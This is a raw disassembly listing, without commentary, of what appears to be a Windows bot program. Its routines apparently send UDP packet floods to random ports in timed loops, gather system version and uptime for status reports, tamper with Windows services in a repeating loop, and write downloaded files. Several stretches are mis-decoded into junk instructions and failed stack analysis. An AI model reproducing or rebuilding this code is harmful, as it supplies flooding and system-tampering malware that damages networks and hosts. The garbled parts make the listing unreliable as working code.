loc_40757C: ; CODE XREF: seg000:0040755A�j
lea eax, [ebp-344h]
push eax
call sub_407E0E
push dword ptr [ebp-30h]
call sub_4102D3
pop ecx
pop ecx
push edi
call near ptr 3D0000h
loc_407598: ; CODE XREF: seg000:0040753A�j
adc bh, [ebx]
retn
; ---------------------------------------------------------------------------
jz short loc_4075A9
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp-4], eax
jmp short loc_4075AC
; ---------------------------------------------------------------------------
loc_4075A9: ; CODE XREF: seg000:0040759B�j
mov [ebp-4], esi
loc_4075AC: ; CODE XREF: seg000:004075A7�j
push 1Ch
lea eax, [ebp-20h]
push ebx
push eax
call sub_410590
or dword ptr [ebp-18h], 0FFFFFFFFh
mov eax, 0FFDCh
add esp, 0Ch
cmp [ebp-3Ch], eax
jle short loc_4075CC
mov [ebp-3Ch], eax
loc_4075CC: ; CODE XREF: seg000:004075C7�j
cmp [ebp-38h], edi
jge short loc_4075D4
mov [ebp-38h], edi
loc_4075D4: ; CODE XREF: seg000:004075CF�j
xor esi, esi
cmp [ebp-40h], ebx
jle short loc_407601
loc_4075DB: ; CODE XREF: seg000:004075FF�j
push dword ptr [ebp-38h]
lea eax, [ebp-20h]
push 1Ch
push eax
push ebx
lea eax, [ebp-10320h]
push dword ptr [ebp-3Ch]
push eax
push dword ptr [ebp-4]
push dword ptr [ebp+8]
call ds:dword_4306C8
inc esi
cmp esi, [ebp-40h]
jl short loc_4075DB
loc_407601: ; CODE XREF: seg000:004075D9�j
push dword ptr [ebp+8]
call ds:dword_430848
lea eax, [ebp-0C0h]
push eax
lea eax, [ebp-344h]
push offset dword_4228D8
push eax
call sub_41050B
add esp, 0Ch
cmp [ebp-28h], ebx
jnz short loc_40764A
push ebx
lea eax, [ebp-344h]
push dword ptr [ebp-2Ch]
push eax
lea eax, [ebp-140h]
push eax
push dword ptr [ebp-144h]
call sub_40E367
add esp, 14h
loc_40764A: ; CODE XREF: seg000:00407628�j
lea eax, [ebp-344h]
push eax
call sub_407E0E
push dword ptr [ebp-30h]
call sub_4102D3
pop ecx
pop ecx
push ebx
call near ptr 3D0000h
stosd
loc_407667: ; DATA XREF: seg000:0040B96E�o
push ebp
mov ebp, esp
mov eax, 10310h
call sub_410BE0
mov eax, [ebp+8]
push ebx
push esi
push edi
push 49h
mov esi, eax
pop ecx
lea edi, [ebp-134h]
rep movsd
push 1
pop esi
mov [eax+120h], esi
call ds:dword_41C04C ; GetTickCount
push eax
call sub_41055D
pop ecx
push 11h
push 2
push 2
call ds:dword_430810
mov ebx, eax
xor edi, edi
push 10h
lea eax, [ebp-10h]
push edi
push eax
call sub_410590
add esp, 0Ch
lea eax, [ebp-0B0h]
mov word ptr [ebp-10h], 2
push eax
call ds:dword_4307D0
cmp eax, 0FFFFFFFFh
mov [ebp+8], eax
jnz short near ptr loc_40774B+1
lea eax, [ebp-0B0h]
push eax
call ds:dword_430814
cmp eax, edi
jnz short near ptr loc_407744+1
lea eax, [ebp-0B0h]
push eax
lea eax, [ebp-334h]
push offset dword_422994
push eax
call sub_41050B
add esp, 0Ch
cmp [ebp-18h], edi
jnz short loc_407728
push edi
lea eax, [ebp-334h]
push dword ptr [ebp-1Ch]
push eax
lea eax, [ebp-130h]
push eax
push dword ptr [ebp-134h]
call sub_40E367
add esp, 14h
loc_407728: ; CODE XREF: seg000:00407706�j
lea eax, [ebp-334h]
push eax
call sub_407E0E
push dword ptr [ebp-20h]
call sub_4102D3
pop ecx
pop ecx
push esi
call near ptr 3D0000h
loc_407744: ; CODE XREF: seg000:004076E6�j
mov al, 8Bh
inc eax
or al, 8Bh
add bl, ch
loc_40774B: ; CODE XREF: seg000:004076D5�j
add ecx, [ebp+8B0845h]
cmp [ebp-24h], edi
mov [ebp-0Ch], eax
jnz short loc_40776A
call sub_410567
cdq
mov ecx, 0FFDCh
idiv ecx
inc edx
push edx
jmp short loc_40776D
; ---------------------------------------------------------------------------
loc_40776A: ; CODE XREF: seg000:00407757�j
push dword ptr [ebp-24h]
loc_40776D: ; CODE XREF: seg000:00407768�j
call ds:dword_430794
cmp [ebp-24h], esi
mov [ebp-0Eh], ax
jge short loc_40777F
mov [ebp-24h], esi
loc_40777F: ; CODE XREF: seg000:0040777A�j
mov eax, 0FFFFh
cmp [ebp-24h], eax
jle short loc_40778C
mov [ebp-24h], eax
loc_40778C: ; CODE XREF: seg000:00407787�j
mov eax, [ebp-30h]
push 0Ah
cdq
pop ecx
idiv ecx
cmp [ebp-28h], edi
mov [ebp-30h], eax
jnz short loc_4077A0
mov [ebp-28h], esi
loc_4077A0: ; CODE XREF: seg000:0040779B�j
xor esi, esi
cmp [ebp-2Ch], edi
jle short loc_4077C1
loc_4077A7: ; CODE XREF: seg000:004077BF�j
call sub_410567
cdq
mov ecx, 0FFh
idiv ecx
inc esi
cmp esi, [ebp-2Ch]
mov [ebp+esi-10311h], dl
jl short loc_4077A7
loc_4077C1: ; CODE XREF: seg000:004077A5�j
; seg000:00407803�j ...
mov eax, [ebp-30h]
dec dword ptr [ebp-30h]
test eax, eax
jle short loc_407820
push 0Bh
pop esi
loc_4077CE: ; CODE XREF: seg000:004077FE�j
lea eax, [ebp-10h]
push 10h
push eax
push edi
call sub_410567
push 0Ah
cdq
pop ecx
idiv ecx
mov eax, [ebp-2Ch]
sub eax, edx
push eax
lea eax, [ebp-10310h]
push eax
push ebx
call ds:dword_4307F4
push dword ptr [ebp-28h]
call ds:dword_41C058 ; Sleep
dec esi
jnz short loc_4077CE
cmp [ebp-24h], edi
jnz short loc_4077C1
call sub_410567
cdq
mov ecx, 0FFDCh
idiv ecx
inc edx
push edx
call ds:dword_430794
mov [ebp-0Eh], ax
jmp short loc_4077C1
; ---------------------------------------------------------------------------
loc_407820: ; CODE XREF: seg000:004077C9�j
lea eax, [ebp-0B0h]
push eax
lea eax, [ebp-334h]
push offset dword_422954
push eax
call sub_41050B
add esp, 0Ch
cmp [ebp-18h], edi
jnz short loc_407860
push edi
lea eax, [ebp-334h]
push dword ptr [ebp-1Ch]
push eax
lea eax, [ebp-130h]
push eax
push dword ptr [ebp-134h]
call sub_40E367
add esp, 14h
loc_407860: ; CODE XREF: seg000:0040783E�j
lea eax, [ebp-334h]
push eax
call sub_407E0E
push dword ptr [ebp-20h]
call sub_4102D3
pop ecx
pop ecx
push edi
call near ptr 3D0000h
stc
; =============== S U B R O U T I N E =======================================
sub_40787D proc near ; CODE XREF: sub_404EB9+74�p
; sub_40799C+217�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
call ds:dword_41C04C ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov ebx, 15180h
xor edx, edx
mov esi, ebx
mov edi, 0E10h
mov ebp, edi
push 3Ch
mov ecx, eax
sub ecx, [esp+14h+arg_0]
mov eax, ecx
div esi
mov esi, edx
xor edx, edx
mov eax, esi
div ebp
pop ebp
mov eax, edx
xor edx, edx
div ebp
xor edx, edx
push eax
mov eax, esi
div edi
xor edx, edx
mov esi, offset dword_430AD8
push eax
mov eax, ecx
div ebx
push eax
push offset dword_4229D0
push 32h
push esi
call sub_410A8A
add esp, 18h
mov eax, esi
pop edi
pop esi
pop ebp
pop ebx
retn
sub_40787D endp
; =============== S U B R O U T I N E =======================================
sub_4078E6 proc near ; CODE XREF: sub_40799C+290�p
push ebx
push esi
push edi
mov esi, 0F4240h
loc_4078EE: ; CODE XREF: sub_4078E6+2F�j
; sub_4078E6+35�j
rdtsc
push 3E8h
mov edi, edx
mov ebx, eax
call ds:dword_41C058 ; Sleep
rdtsc
sub eax, ebx
push 0
sbb edx, edi
push esi
push edx
push eax
call sub_412180
mov edi, edx
mov ebx, eax
test edi, edi
ja short loc_4078EE
jb short loc_40791D
cmp ebx, esi
ja short loc_4078EE
loc_40791D: ; CODE XREF: sub_4078E6+31�j
push 0
push 64h
push edi
push ebx
call sub_412100
mov ecx, edx
push 64h
xor edx, edx
mov esi, eax
test ecx, ecx
pop eax
ja short loc_407990
jb short loc_40793C
cmp esi, 50h
jnb short loc_407941
loc_40793C: ; CODE XREF: sub_4078E6+4F�j
push 4Bh
xor edx, edx
pop eax
loc_407941: ; CODE XREF: sub_4078E6+54�j
test ecx, ecx
ja short loc_407990
jb short loc_40794C
cmp esi, 47h
jnb short loc_407951
loc_40794C: ; CODE XREF: sub_4078E6+5F�j
push 42h
xor edx, edx
pop eax
loc_407951: ; CODE XREF: sub_4078E6+64�j
test ecx, ecx
ja short loc_407990
jb short loc_40795C
cmp esi, 37h
jnb short loc_407961
loc_40795C: ; CODE XREF: sub_4078E6+6F�j
push 32h
xor edx, edx
pop eax
loc_407961: ; CODE XREF: sub_4078E6+74�j
test ecx, ecx
ja short loc_407990
jb short loc_40796C
cmp esi, 26h
jnb short loc_407971
loc_40796C: ; CODE XREF: sub_4078E6+7F�j
push 21h
xor edx, edx
pop eax
loc_407971: ; CODE XREF: sub_4078E6+84�j
test ecx, ecx
ja short loc_407990
jb short loc_40797C
cmp esi, 1Eh
jnb short loc_407981
loc_40797C: ; CODE XREF: sub_4078E6+8F�j
push 19h
xor edx, edx
pop eax
loc_407981: ; CODE XREF: sub_4078E6+94�j
test ecx, ecx
ja short loc_407990
jb short loc_40798C
cmp esi, 0Ah
jnb short loc_407990
loc_40798C: ; CODE XREF: sub_4078E6+9F�j
xor eax, eax
xor edx, edx
loc_407990: ; CODE XREF: sub_4078E6+4D�j
; sub_4078E6+5D�j ...
sub eax, esi
sbb edx, ecx
add eax, ebx
adc edx, edi
pop edi
pop esi
pop ebx
retn
sub_4078E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40799C proc near ; CODE XREF: seg000:0040DC69�p
var_7E8 = byte ptr -7E8h
var_668 = byte ptr -668h
var_5E8 = byte ptr -5E8h
var_568 = byte ptr -568h
var_4E8 = byte ptr -4E8h
var_3E4 = byte ptr -3E4h
var_2E8 = byte ptr -2E8h
var_25C = word ptr -25Ch
var_25A = byte ptr -25Ah
var_15C = byte ptr -15Ch
var_114 = byte ptr -114h
var_CC = dword ptr -0CCh
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = byte ptr -0B8h
var_38 = byte ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_18 = byte ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 7E8h
push ebx
push esi
lea eax, [ebp+var_CC]
push edi
push eax
mov [ebp+var_4], offset dword_42F3E8
mov [ebp+var_CC], 94h
call ds:dword_41C0EC ; GetVersionExA
xor ebx, ebx
cmp [ebp+var_C8], 4
jnz short loc_407A23
cmp [ebp+var_C4], ebx
jnz short loc_4079FF
cmp [ebp+var_BC], 1
jnz short loc_4079E9
mov [ebp+var_4], offset dword_422B04
loc_4079E9: ; CODE XREF: sub_40799C+44�j
cmp [ebp+var_BC], 2
jnz loc_407A9E
mov [ebp+var_4], offset dword_422B00
jmp short loc_407A6F
; ---------------------------------------------------------------------------
loc_4079FF: ; CODE XREF: sub_40799C+3B�j
cmp [ebp+var_C4], 0Ah
jnz short loc_407A11
mov [ebp+var_4], offset dword_422AFC
jmp short loc_407A66
; ---------------------------------------------------------------------------
loc_407A11: ; CODE XREF: sub_40799C+6A�j
cmp [ebp+var_C4], 5Ah
jnz short loc_407A5F
mov [ebp+var_4], offset dword_422AF8
jmp short loc_407A66
; ---------------------------------------------------------------------------
loc_407A23: ; CODE XREF: sub_40799C+33�j
cmp [ebp+var_C8], 5
jnz short loc_407A5F
cmp [ebp+var_C4], ebx
jnz short loc_407A3D
mov [ebp+var_4], offset dword_422AF4
jmp short loc_407A66
; ---------------------------------------------------------------------------
loc_407A3D: ; CODE XREF: sub_40799C+96�j
cmp [ebp+var_C4], 1
jnz short loc_407A4F
mov [ebp+var_4], offset dword_422AF0
jmp short loc_407A66
; ---------------------------------------------------------------------------
loc_407A4F: ; CODE XREF: sub_40799C+A8�j
cmp [ebp+var_C4], 2
mov [ebp+var_4], offset dword_422AE8
jz short loc_407A66
loc_407A5F: ; CODE XREF: sub_40799C+7C�j
; sub_40799C+8E�j
mov [ebp+var_4], offset dword_422AE4
loc_407A66: ; CODE XREF: sub_40799C+73�j
; sub_40799C+85�j ...
cmp [ebp+var_BC], 2
jnz short loc_407A9E
loc_407A6F: ; CODE XREF: sub_40799C+61�j
cmp [ebp+var_B8], bl
jz short loc_407A9E
lea eax, [ebp+var_B8]
push eax
lea eax, [ebp+var_2E8]
push [ebp+var_4]
push offset dword_422ADC
push eax
call sub_41050B
lea eax, [ebp+var_2E8]
add esp, 10h
mov [ebp+var_4], eax
loc_407A9E: ; CODE XREF: sub_40799C+54�j
; sub_40799C+D1�j ...
mov ax, ds:word_422AD8
push 3Fh
mov [ebp+var_25C], ax
pop ecx
xor eax, eax
lea edi, [ebp+var_25A]
rep stosd
stosw
mov eax, ds:dword_430690
mov [ebp+var_C], 100h
cmp eax, ebx
jz short loc_407AD7
lea ecx, [ebp+var_C]
push ecx
lea ecx, [ebp+var_25C]
push ecx
call eax
loc_407AD7: ; CODE XREF: sub_40799C+12C�j
push [ebp+arg_4]
call sub_407435
pop ecx
push eax
call ds:dword_4307D0
mov [ebp+var_8], eax
push 2
lea eax, [ebp+var_8]
push 4
push eax
call ds:dword_430750
cmp eax, ebx
jz short loc_407B00
push dword ptr [eax]
jmp short loc_407B05
; ---------------------------------------------------------------------------
loc_407B00: ; CODE XREF: sub_40799C+15E�j
push offset dword_422AC0
loc_407B05: ; CODE XREF: sub_40799C+162�j
lea eax, [ebp+var_3E4]
push eax
call sub_41050B
pop ecx
lea eax, [ebp+var_4E8]
pop ecx
push 104h
push eax
call near ptr 3D0000h
xchg eax, edx
lea eax, [ebp+var_114]
push 46h
push eax
push offset dword_422AB4
push ebx
mov esi, 409h
push ebx
push esi
call near ptr 3D0000h
insd
lea eax, [ebp+var_15C]
push 46h
push eax
push offset dword_41F888
push ebx
push ebx
push esi
call near ptr 3D0000h
fldcw word ptr [edx+20h]
lea eax, [ebp+var_38]
push ebx
push eax
call sub_410590
add esp, 0Ch
lea eax, [ebp+var_38]
push eax
call near ptr 3D0000h
loope near ptr loc_407BC3+2
push ebx
lea eax, [ebp+var_18]
push ebx
push eax
lea eax, [ebp+var_4E8]
push eax
call sub_4121E8
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_7E8]
push eax
call sub_40878B
push 60h
mov esi, eax
pop ecx
lea edi, [ebp+var_7E8]
rep movsd
push 60h
lea esi, [ebp+var_7E8]
pop ecx
lea edi, [ebp+var_668]
rep movsd
push ebx
call sub_40787D
add esp, 20h
push eax
lea eax, [ebp+var_15C]
push eax
loc_407BC3: ; CODE XREF: sub_40799C+1D4�j
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_25C]
push eax
push [ebp+arg_4]
call sub_407435
pop ecx
push eax
lea eax, [ebp+var_3E4]
push eax
lea eax, [ebp+var_4E8]
push eax
lea eax, [ebp+var_5E8]
push [ebp+var_C0]
push [ebp+var_C4]
push [ebp+var_C8]
push [ebp+var_4]
push eax
lea eax, [ebp+var_568]
push eax
mov eax, [ebp+var_2C]
shr eax, 0Ah
push ebx
push eax
call sub_40867B
pop ecx
pop ecx
push eax
mov eax, [ebp+var_30]
shr eax, 0Ah
push ebx
push eax
call sub_40867B
pop ecx
pop ecx
push eax
call sub_4078E6
push edx
push eax
push offset dword_4229DC
push 200h
push [ebp+arg_0]
call sub_410A8A
mov eax, [ebp+arg_0]
add esp, 50h
pop edi
pop esi
pop ebx
leave
retn
sub_40799C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407C50 proc near ; CODE XREF: seg000:0040CE6F�p
; seg000:0040DC97�p
var_8C = byte ptr -8Ch
var_C = byte ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8Ch
push esi
mov esi, 80h
push esi
lea eax, [ebp+var_8C]
push 0
push eax
call sub_410590
add esp, 0Ch
cmp ds:dword_430878, 0
jnz short loc_407CC4
push 0
lea eax, [ebp+var_8C]
push esi
push eax
lea eax, [ebp+var_C]
push eax
call ds:dword_430678
test eax, eax
jnz short loc_407CA5
lea eax, [ebp+var_8C]
push offset dword_422B58
push eax
call sub_41050B
pop ecx
pop ecx
loc_407CA5: ; CODE XREF: sub_407C50+40�j
test [ebp+var_C], 1
jz short loc_407CBD
push offset dword_422B50
loc_407CB0: ; CODE XREF: sub_407C50+72�j
lea eax, [ebp+var_8]
push eax
call sub_41050B
pop ecx
pop ecx
jmp short loc_407CE3
; ---------------------------------------------------------------------------
loc_407CBD: ; CODE XREF: sub_407C50+59�j
push offset dword_422B4C
jmp short loc_407CB0
; ---------------------------------------------------------------------------
loc_407CC4: ; CODE XREF: sub_407C50+28�j
mov esi, offset dword_422B48
lea eax, [ebp+var_8]
push esi
push eax
call sub_41050B
lea eax, [ebp+var_8C]
push esi
push eax
call sub_41050B
add esp, 10h
loc_407CE3: ; CODE XREF: sub_407C50+6B�j
push [ebp+arg_4]
push [ebp+arg_8]
call sub_407435
pop ecx
push eax
lea eax, [ebp+var_8C]
push eax
lea eax, [ebp+var_8]
push eax
push offset dword_422B08
push 200h
push [ebp+arg_0]
call sub_410A8A
mov eax, [ebp+arg_0]
add esp, 1Ch
pop esi
leave
retn
sub_407C50 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407D16 proc near ; CODE XREF: seg000:0040CDA2�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push esi
push edi
mov esi, offset dword_434B58
mov edi, 0B8h
loc_407D2A: ; CODE XREF: sub_407D16+33�j
cmp byte ptr [esi], 0
jz short loc_407D4D
push [ebp+arg_0]
push esi
call sub_410930
pop ecx
test eax, eax
pop ecx
jz short loc_407D4D
inc [ebp+var_4]
add esi, edi
cmp esi, offset dword_4356D8
jl short loc_407D2A
jmp short loc_407D8F
; ---------------------------------------------------------------------------
loc_407D4D: ; CODE XREF: sub_407D16+17�j
; sub_407D16+26�j
mov esi, [ebp+var_4]
push ebx
imul esi, 0B8h
push edi
push 0
lea ebx, dword_434B58[esi]
push ebx
call sub_410590
push 17h
push [ebp+arg_0]
push ebx
call sub_411D00
push 9Fh
lea eax, dword_434B70[esi]
push [ebp+arg_4]
push eax
call sub_411D00
add esp, 24h
inc ds:dword_42561C
pop ebx
loc_407D8F: ; CODE XREF: sub_407D16+35�j
mov eax, [ebp+var_4]
pop edi
pop esi
leave
retn
sub_407D16 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407D96 proc near ; CODE XREF: seg000:0040DDD8�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push esi
push edi
push 0
push [ebp+arg_8]
push offset dword_422B74
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40E367
add esp, 14h
xor edi, edi
mov esi, offset dword_434B58
loc_407DC0: ; CODE XREF: sub_407D96+72�j
cmp byte ptr [esi], 0
jz short loc_407DFB
lea eax, [esi+18h]
push eax
push esi
push edi
push offset dword_422B68
lea eax, [ebp+var_200]
push 200h
push eax
call sub_410A8A
push 1
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40E367
add esp, 2Ch
loc_407DFB: ; CODE XREF: sub_407D96+2D�j
add esi, 0B8h
inc edi
cmp esi, offset dword_4356D8
jl short loc_407DC0
pop edi
pop esi
leave
retn
sub_407D96 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407E0E proc near ; CODE XREF: start+97�p
; seg000:004014CC�p ...
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
lea eax, [ebp+var_10]
push edi
push eax
call ds:dword_41C000 ; GetLocalTime
mov ebx, offset dword_434B10
mov edi, 80h
mov esi, offset dword_430B10
loc_407E30: ; CODE XREF: sub_407E0E+3D�j
cmp byte ptr [ebx], 0
jz short loc_407E47
push 7Fh
lea eax, [ebx+80h]
push ebx
push eax
call sub_411D00
add esp, 0Ch
loc_407E47: ; CODE XREF: sub_407E0E+25�j
sub ebx, edi
cmp ebx, esi
jge short loc_407E30
movzx eax, [ebp+var_4]
push [ebp+arg_0]
push eax
movzx eax, [ebp+var_6]
push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_10]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
push offset dword_422B84
push edi
push esi
call sub_410A8A
add esp, 28h
pop edi
pop esi
pop ebx
leave
retn
sub_407E0E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407E82 proc near ; CODE XREF: sub_405982+15B�p
; sub_405B0A+1AF�p ...
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 80h
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_80]
push [ebp+arg_0]
push 80h
push eax
call sub_41232F
lea eax, [ebp+var_80]
push eax
call sub_407E0E
add esp, 14h
leave
retn
sub_407E82 endp
; =============== S U B R O U T I N E =======================================
sub_407EAE proc near ; CODE XREF: seg000:0040DCCF�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, offset dword_430B10
xor ecx, ecx
loc_407EB5: ; CODE XREF: sub_407EAE+13�j
mov [eax], cl
add eax, 80h
cmp eax, offset dword_434B10
jl short loc_407EB5
cmp [esp+arg_C], ecx
push esi
mov esi, offset dword_422BA8
jnz short loc_407EE5
push ecx
push [esp+8+arg_8]
push esi
push [esp+10h+arg_4]
push [esp+14h+arg_0]
call sub_40E367
add esp, 14h
loc_407EE5: ; CODE XREF: sub_407EAE+1F�j
push esi
call sub_407E0E
pop ecx
pop esi
retn
sub_407EAE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407EEE proc near ; DATA XREF: seg000:0040DD82�o
var_31C = byte ptr -31Ch
var_11C = dword ptr -11Ch
var_118 = byte ptr -118h
var_98 = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 31Ch
mov eax, [ebp+arg_0]
push esi
push edi
push 45h
pop ecx
mov esi, eax
lea edi, [ebp+var_11C]
push 1
rep movsd
xor edx, edx
pop edi
cmp [ebp+var_10], edx
mov [ebp+var_8], 80h
mov [ebp+var_4], edx
mov [eax+110h], edi
jnz short loc_407F41
push edx
lea eax, [ebp+var_118]
push [ebp+var_14]
push offset dword_422C10
push eax
push [ebp+var_11C]
call sub_40E367
add esp, 14h
loc_407F41: ; CODE XREF: sub_407EEE+33�j
cmp [ebp+var_98], 0
jz short loc_407F61
lea eax, [ebp+var_98]
push eax
call sub_410A7F
test eax, eax
pop ecx
mov [ebp+var_4], eax
jz short loc_407F61
mov [ebp+var_8], eax
loc_407F61: ; CODE XREF: sub_407EEE+5A�j
; sub_407EEE+6E�j
and [ebp+arg_0], 0
mov esi, offset dword_430B10
loc_407F6A: ; CODE XREF: sub_407EEE+D4�j
mov eax, [ebp+arg_0]
cmp eax, [ebp+var_8]
jge short loc_407FC4
cmp byte ptr [esi], 0
jz short loc_407FB3
cmp [ebp+var_98], 0
jz short loc_407F99
cmp [ebp+var_4], 0
jnz short loc_407F99
lea eax, [ebp+var_98]
push eax
push esi
call sub_406E06
pop ecx
test eax, eax
pop ecx
jz short loc_407FB3
loc_407F99: ; CODE XREF: sub_407EEE+90�j
; sub_407EEE+96�j
push edi
lea eax, [ebp+var_118]
push [ebp+var_14]
push esi
push eax
push [ebp+var_11C]
call sub_40E367
add esp, 14h
loc_407FB3: ; CODE XREF: sub_407EEE+87�j
; sub_407EEE+A9�j
inc [ebp+arg_0]
add esi, 80h
cmp esi, offset dword_434B10
jl short loc_407F6A
loc_407FC4: ; CODE XREF: sub_407EEE+82�j
lea eax, [ebp+var_31C]
push offset dword_422BE0
push eax
call sub_41050B
xor esi, esi
pop ecx
cmp [ebp+var_10], esi
pop ecx
jnz short loc_407FFE
push esi
lea eax, [ebp+var_31C]
push [ebp+var_14]
push eax
lea eax, [ebp+var_118]
push eax
push [ebp+var_11C]
call sub_40E367
add esp, 14h
loc_407FFE: ; CODE XREF: sub_407EEE+EE�j
lea eax, [ebp+var_31C]
push eax
call sub_407E0E
push [ebp+var_18]
call sub_4102D3
pop ecx
pop ecx
push esi
call near ptr 3D0000h
pushf
pop edi
pop esi
sub_407EEE endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40801D proc near ; CODE XREF: seg000:004070F7�p
; seg000:00408091�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, offset dword_422C40
xor esi, esi
mov ebx, offset dword_423088
loc_408030: ; CODE XREF: sub_40801D+69�j
lea eax, [ebp+var_4]
push esi
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
push dword ptr [edi+4]
push dword ptr [edi]
call ds:dword_43074C
cmp [ebp+arg_0], esi
jz short loc_40806A
push [ebp+arg_0]
call sub_410B60
pop ecx
push eax
push [ebp+arg_0]
push 1
push esi
push ebx
push [ebp+var_4]
call ds:dword_4307B8
jmp short loc_408074
; ---------------------------------------------------------------------------
loc_40806A: ; CODE XREF: sub_40801D+2F�j
push ebx
push [ebp+var_4]
call ds:dword_43070C
loc_408074: ; CODE XREF: sub_40801D+4B�j
push [ebp+var_4]
call ds:dword_430770
add edi, 8
cmp edi, offset dword_422C58
jl short loc_408030
pop edi
pop esi
pop ebx
leave
retn
sub_40801D endp
; ---------------------------------------------------------------------------
loc_40808D: ; CODE XREF: seg000:004080A3�j
; DATA XREF: sub_4089FD+52F�o
push dword ptr [esp+4]
call sub_40801D
pop ecx
push ds:dword_422C38
call ds:dword_41C058 ; Sleep
jmp short loc_40808D
; =============== S U B R O U T I N E =======================================
sub_4080A5 proc near ; CODE XREF: seg000:00408136�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov edx, [esp+arg_0]
push esi
or esi, 0FFFFFFFFh
test eax, eax
jz short loc_4080DA
push ebx
push edi
lea edi, [eax]
mov ecx, 0FFh
loc_4080BE: ; CODE XREF: sub_4080A5+31�j
mov al, [edx]
mov ebx, esi
and eax, ecx
and ebx, ecx
xor eax, ebx
shr esi, 8
mov eax, ds:dword_41C23C[eax*4]
xor esi, eax
inc edx
dec edi
jnz short loc_4080BE
pop edi
pop ebx
loc_4080DA: ; CODE XREF: sub_4080A5+E�j
mov eax, esi
pop esi
not eax
retn
sub_4080A5 endp
; ---------------------------------------------------------------------------
push ebx
push esi
xor ebx, ebx
push edi
push ebx
call sub_410C0F
mov dword ptr [esp], offset dword_41F660
push dword ptr [esp+14h]
mov esi, eax
call sub_411B4E
mov edi, eax
pop ecx
test edi, edi
pop ecx
jz short loc_40812F
loc_408105: ; CODE XREF: seg000:0040812D�j
test byte ptr [edi+0Ch], 10h
jnz short loc_408133
inc ebx
push ebx
push esi
call sub_41237F
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_40812F
push edi
push 1
lea eax, [esi+ebx-1]
push 1
push eax
call sub_411A46
add esp, 10h
jmp short loc_408105
; ---------------------------------------------------------------------------
loc_40812F: ; CODE XREF: seg000:00408103�j
; seg000:00408119�j
xor eax, eax
jmp short loc_40814E
; ---------------------------------------------------------------------------
loc_408133: ; CODE XREF: seg000:00408109�j
dec ebx
push ebx
push esi
call sub_4080A5
push esi
mov ebx, eax
call sub_410C83
push edi
call sub_4119F0
add esp, 10h
mov eax, ebx
loc_40814E: ; CODE XREF: seg000:00408131�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_408152: ; DATA XREF: seg000:0040C1DD�o
; seg000:0040C851�o
push ebp
mov ebp, esp
sub esp, 510h
mov eax, [ebp+8]
push ebx
push esi
push edi
mov ecx, 0AAh
mov esi, eax
lea edi, [ebp-2CCh]
push 1
rep movsd
pop edi
xor esi, esi
push esi
mov [eax+2A4h], edi
push esi
push esi
lea eax, [ebp-248h]
push esi
push eax
push ds:dword_430748
call ds:dword_4306B4
cmp eax, esi
mov [ebp-18h], eax
jz loc_4085DE
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp-148h]
push 40000000h
push eax
call ds:dword_41C078 ; CreateFileA
cmp eax, edi ; CODE XREF: seg000:0040822B�j
mov [ebp-20h], eax
jnb short near ptr loc_408218+1
lea eax, [ebp-148h]
push eax
lea eax, [ebp-510h]
push offset dword_422ED0
push eax
call sub_41050B
add esp, 0Ch
cmp [ebp-30h], esi
jnz short loc_4081FC
push esi
lea eax, [ebp-510h]
push dword ptr [ebp-2Ch]
push eax
lea eax, [ebp-2C8h]
push eax
push dword ptr [ebp-2CCh]
call sub_40E367
add esp, 14h
loc_4081FC: ; CODE XREF: seg000:004081DA�j
lea eax, [ebp-510h]
push eax
